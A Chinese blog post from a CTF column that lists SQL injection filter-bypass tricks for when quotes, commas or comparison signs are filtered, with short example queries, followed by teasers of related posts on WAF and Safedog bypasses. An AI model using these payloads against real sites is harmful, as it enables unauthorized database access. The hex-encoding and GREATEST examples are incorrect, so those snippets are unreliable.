sql注入绕过小总结

最新推荐文章于 2024-05-29 14:48:41 发布
最新推荐文章于 2024-05-29 14:48:41 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaorouji/article/details/80551727
版权

这篇应该会一直更新,反正遇到了就记一记免得忘了

一、引号

在sql语句where部分,会用到引号,举个栗子

select column_name from information_schema.columns where table_name="table"

如果引号过滤了,那样的话上面的查询就进行不了了,这个时候可以用十六进制进行绕过

“table"十六进制是0x937461626c6522

这样,原来的payload就可以写成

select column_name from information_schema.columns where table_name=0x937461626c6522

二、逗号

有时候盲注用到mid(),substr(),limit什么的,然后逗号居然不给用!!!蛇皮啊...........

前两个函数用from for绕过,limit用offset绕过

mid(database())from(1)for(1)

substr(database())from(1)for(1)

limit (0,1)等于limit 1 offset 0

三、大于小于号

有时候盲注比较ascii值大小时不给用大于小于号就很难受

这个时候就用greatest绕过了

select * from users where id=1 and ord(mid(database(),0,1))>97

等价 select * from users where id=1 and greatest(ord(mid(database(),0,1)),64)=97

解释一波

greatest(x1,x2,x3)函数返回三个里面数值最大的数


Xi4or0uji
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql的emp,dept小总结
weixin_44496333的博客
08-28 2506
1、选择部门20中的雇员 select * from emp where deptno = 20; 2、列出所有办事员的姓名、编号和部门名称 select ename 姓名, empno 编号, deptno 部门名称 from emp where job = 'CLERK'; 或者 【了解】 select e.ename 姓名, e.empno 编号, e.deptno 部门编号, (select d.dname from dept d where e.deptno = d.deptno) 部门名
sql注入学习总结
weixin_44232532的博客
02-20 362
sql注入综述 一直没有时间整理sql注入的相关知识,很多东西学习后都很容易忘记,今天在博客上整理好,希望能够加深自己的印象,后期也会在本文章中更新自己新学到的相关知识。 手工注入 手工注入还是以sqli-labs-master靶场实验环境为演示对象。 一.SQL注入常用命令-union联合查询 union 操作符用于拼接两个或者多select查询语句 union中的每个查询必须拥有相同的...
SQL注入绕过技巧
misiwole的博客
01-21 8563
转载自:https://blog.csdn.net/weixin_44940180/article/details/107717511 基本绕过方法 1.大小写 2.双写 3.编码,如URLEncode编码,ASCII编码绕过 4.内敛注释 空格绕过 1.用注释替换空格 select//user,password//from /**/users; 2.空格url编码%20 3.两个空格代替一个空格 4.用Tab代替空格 5.%a0=空格 6.如果空格被过滤,括号没有被过滤,可以用括号绕过 select(u
SQL注入绕过正则及无列名注入
热门推荐
钟言的博客
12-19 1万+
本篇为SQL注入绕过正则表达式及无列名注入,详细内容包含了select\bNslS]bfrom正则 科学计数法绕过 过滤information 四、无列名注入 1、利用 join-using 注列名 2、无列名查询 五、报错注入7大常用函数 1.ST LatFromGeoHash() (mysql>=5.7.x)payload 2.ST LongFromGeoHash (mysql>=5.7.x) payload 3.GTID (MySQL >= 5.6.X - 显错
记一次艰难的SQL注入(过安全狗)
最新发布
白帽子凯哥聊黑客
05-29 1211
实战注入的难度比靶场大得多,各种绕过,各种骚操作。要学会利用搜索工具,更要学会选择性放弃。当一条路走不通就换另一种方法,也许就会柳暗花明又一村。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取。
SQL盲注获取数据库信息、绕过WAF
buffedon的博客
05-16 1543
SQL盲注利用流程及绕过WAF盲注1. 分类实现方式分类按照注入方式2. 原理3. 作用3.1 绕过WAF(规范化方法)3.2 sql盲注绕过WEB4. 利用技巧+特殊函数(盲注核心)截断函数编码函数regexp + 正则表达式模糊查询5. 流程5.1 获取当前数据库5.2 获取当前数据库中的表5.2.1 逐个读取-----limit 0,15.2.2 全部读取5.3 获取当前数据库中敏感表的列5.4 读取数据库具体单元格的值6. 利用burpsuite获取数据操作过程7. 编写python脚本7.1 布尔
SQL注入漏洞详解
weixin_44756468的博客
04-21 1167
差异备份数据库得到webshell。在sqlserver里dbo和sa权限都有备份数据库权限,我们可以把数据库备份称asp文件,这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。
SQL注入绕过安全狗
blackguest07的博客
01-12 2287
SQL注入绕过安全狗,内容很详细,本文仅供学习,请勿做一些非法事情,出事与博主无关。
sql注入绕过方法总结
12-19
sql注入绕过方法总结绕过waf,D盾
SQL注入绕过的技巧总结
09-09
总结来说,SQL注入绕过技术需要根据目标系统的具体过滤规则来灵活应用。随着安全技术的发展,虽然SQL注入已不像以前那样普遍,但仍然存在很多未修补的漏洞。因此,开发人员应始终确保对用户输入进行充分验证和过滤,...
SQL注入绕过实战案例
08-31
本文将深入探讨SQL注入的概念、工作原理,并通过"SQL注入实战案例"来阐述如何进行有效防御和绕过。我们将基于sqli-labs-master靶场进行学习,这是一个专门用于SQL注入攻防演练的平台。 SQL注入(SQL Injection)是...
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
生命在于学习——SQL注入绕过
易水哲的博客
08-17 9615
SQL注入绕过技术已经是一个老生常淡的内容了
ureport 显示html,Ureport2报表使用问题及注意事项汇总
weixin_29887801的博客
06-15 2374
近期处理了一些Ureport2报表问题,对源码略有了解。现将所遇到的问题总结如下:------------------------------------------问题:html显示的表格实际宽度比例与设计页面的colspan合并数不一致【使用不当】原因:首行为合并行导致html表格的宽度设置失效处理:第一行上右键设置“重复表头”,报表正文从第二行开始。注意:不要通过关闭换行这种治标不治本的方式...
SQL注入秘籍【绕过篇】
大河之犬的博客
03-22 1601
另一种方法是使用CLR,MSSQL CLR 是一项功能,允许在 SQL Server 数据库上运行托管代码,包括 C# 和 Visual Basic。编码无非就是hex、url等等编码,让传到数据库的数据能够解析的即可,比如URL编码一般在传给业务的时候就会自动解码。,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名。来替代空格,也可以混合使用(规律有不同,可以自己本地尝试),是直接使用cmd /c来执行命令的,会被360拦截,可以用。
黑客常用SQL注入绕过技术总结!(冰河吐血整理
q16974058的博客
04-08 1148
引领完成Docker的安装、部署、管理和扩展,让其经历从测试到生产的整个开发生命周期,深入了解Docker适用于什么场景。并且这本Docker的学习权威指南介绍了其组件的基础知识,然后用Docker构建容器和服务来完成各种任务:利用Docker为新项目建立测试环境,演示如何使用持续集成的工作流集成Docker,如何构建应用程序服务和平台,如何使用Docker的API,如何扩展Docker。
SQL注入原理及思路(绕过)-超详细
weixin_52501704的博客
05-17 2949
(1)user() 返回当前使用数据库的用户,也就是网站配置文件中连接数据库的账号 (2)version() 返回当前数据库的版本 (3)database() 返回当前使用的数据库,只有在use命令选择一个数据库之后,才能查到 (4)group_concat() 把数据库中的某列数据或某几列数据合并为一个字符串 (5)@@datadir 数据库路径 (6)@@version_compile_os 操作系统版本。通过+1、-1、and 1=1、and 1=2、注释符。或者通过报错注入是网页返回报错信息。
iwebsec靶场 SQL注入漏洞通关笔记11-16进制编码绕过
mooyuan的博客
12-01 2435
打开靶场,url为id=1如下所示SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第11关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的报错型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的11关增加了addslashes和get_magic_quotes_gpc函数,可以使用16进制编码的方式进行绕过
mybatis xml sql语句报错:大于号、小于号的转义写法 Error creating document instance
forthrlock的博客
06-17 2239
mybatis xml中是sql语句报错: Error creating document instance. Cause: org.xml.sax.SAXParseException: The 版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://blog.csdn.net/u013614451/article/details/39576621 收起 最近项目折腾了老半天,找了资料才知道是这么回事。。。 因为语句中有一个小于号“
sql注入绕过防火墙
12-01
为了绕过防火墙的SQL注入,可以使用一些技巧和方法,例如: 1. 双写绕过:在SQL注入语句中,将关键字双写,例如将SELECT写成SSELECT,将UNION写成UUNION,这样可以绕过一些简单的防火墙。 2. 使用特殊字符:在SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值